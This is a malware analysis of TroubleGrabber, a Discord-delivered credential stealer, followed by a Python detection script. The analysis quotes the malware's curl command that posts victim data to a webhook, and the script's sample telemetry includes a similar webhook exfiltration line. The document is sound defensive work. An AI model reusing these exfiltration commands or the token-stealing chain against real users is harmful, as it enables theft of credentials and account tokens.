TroubleGrabber – Gen:Variant.Razy.742965 and Gen:Variant.Razy.728469 were the first stage payload of Gen:Variant.Razy.729793, a new malware variant we had not seen before October 2020. All the files associated with these detections were delivered via Discord, and they used Discord for malware delivery, next stage payloads, and C2 communication.

The visual depiction of the TroubleGrabber attack kill chain is shown in Figure 2.

Figure 2: TroubleGrabber attack kill chain

Figure 2 illustrates the following steps:
1. The delivery of TroubleGrabber to the victim's machine via a Discord attachment link.
2. TroubleGrabber using Discord and Github to download the next stage payloads to the victim's machine.
3. The payloads steal the victim's credentials, such as system information, IP address, web browser passwords, and tokens, and send them as a chat message back to the attacker via a webhook URL.

The sample we are using for this analysis was hosted in the Discord URL – (md5 – 172c6141eaa2a9b09827d149cb3b05ca). The downloaded archive "Discord_Nitro_Generator_and_Checker.rar" masqueraded as a Discord Nitro Generator application. The archive contained an executable file named "Discord Nitro Generator and Checker.exe". An excerpt from the decompiled code is shown in Figure 3.

Figure 3: Decompiled code of Discord Nitro Generator and Checker.exe

Figure 3 illustrates that the executable downloads the next stage payloads to "C:/temp" from the seven URLs hosted in Discord and Github as listed below. The functionality of curl.exe, Curl-ca-bundle.crt, WebBrowserPassView.exe, tokenstealer.vbs, Tokenstealer2.vbs, Tokenstealer.bat, and sendhookfile.exe is as follows:

Curl.exe
Curl.exe is a command-line tool used for uploading, downloading, and posting data over multiple supported protocols. The malware uses a curl command to post a status message containing the victim's details via webhook, as follows: C:/temp/curl -X POST -H "Content-type: application/json" -data "" Webhook

Curl-ca-bundle.crt
Curl-ca-bundle.crt is the certificate bundle curl uses to validate the remote server. Curl performs SSL certificate verification using the public certificate authorities present in the file curl-ca-bundle.crt when uploading, downloading, and posting data.

WebBrowserPassView.exe
WebBrowserPassView.exe is a password recovery utility from Nirsoft that reveals the passwords saved in web browsers. This utility has a history of being used by threat actors to steal the stored passwords and send them back to their C2.
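As an added detection example (not part of the original analysis), the following Python scans process-creation records for the behaviours described above: the dropped tools running out of the C:/temp staging directory, a script host launching the tokenstealer VBS/BAT components, and curl.exe posting JSON to a Discord webhook. The Sysmon-style Image/CommandLine field names, the sample events and the webhook URL in them are assumptions constructed for this example; the tool names and staging path come from the analysis.

```python
import re
from pathlib import PureWindowsPath

# Tool names and the C:/temp staging directory are taken from the analysis above;
# the webhook pattern is the public shape of a Discord webhook URL. Records use
# Sysmon Event ID 1 style 'Image' / 'CommandLine' fields (an assumption here).
STAGED_TOOLS = {"curl.exe", "webbrowserpassview.exe", "sendhookfile.exe"}
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "cmd.exe"}
STAGING_DIR = re.compile(r"^c:[\\/]temp[\\/]", re.IGNORECASE)
TOKEN_SCRIPT = re.compile(r"tokenstealer2?\.(?:vbs|bat)\b", re.IGNORECASE)
WEBHOOK_URL = re.compile(
    r"https://(?:\w+\.)?discord(?:app)?\.com/api/webhooks/\d+/\S+", re.IGNORECASE)


def classify(event: dict) -> list[str]:
    """Return the names of every rule a single process-creation event matches."""
    image = event.get("Image", "")
    cmdline = event.get("CommandLine", "")
    name = PureWindowsPath(image).name.lower()  # basename, either slash style
    hits = []
    # curl.exe posting JSON to a Discord webhook: the exfiltration step.
    if name == "curl.exe" and re.search(r"-X\s+POST", cmdline) and WEBHOOK_URL.search(cmdline):
        hits.append("curl_post_to_discord_webhook")
    # One of the dropped tools executing from the C:/temp staging directory.
    if name in STAGED_TOOLS and STAGING_DIR.match(image):
        hits.append("staged_tool_in_temp")
    # A script host launching the tokenstealer VBS/BAT components.
    if name in SCRIPT_HOSTS and TOKEN_SCRIPT.search(cmdline):
        hits.append("tokenstealer_script_launched")
    return hits


def triage(events: list[dict]) -> dict[int, list[str]]:
    """Map event index -> matched rules, keeping only events with a hit."""
    return {i: hits for i, ev in enumerate(events) if (hits := classify(ev))}


# Constructed sample telemetry: one benign curl run, then three chain stages.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\curl.exe",
     "CommandLine": "curl.exe -sS https://updates.example.internal/health"},
    {"Image": r"C:\Windows\System32\wscript.exe",
     "CommandLine": r"wscript.exe C:\temp\Tokenstealer2.vbs"},
    {"Image": r"C:\temp\WebBrowserPassView.exe",
     "CommandLine": r"C:\temp\WebBrowserPassView.exe"},
    {"Image": "C:/temp/curl.exe",
     "CommandLine": 'C:/temp/curl -X POST -H "Content-type: application/json" '
                    '--data "{}" https://discord.com/api/webhooks/0000/EXAMPLE_TOKEN'},
]
```

Running triage(SAMPLE_EVENTS) leaves the benign system curl call unflagged and reports the three staged events, with the final curl record matching both the webhook and staging rules.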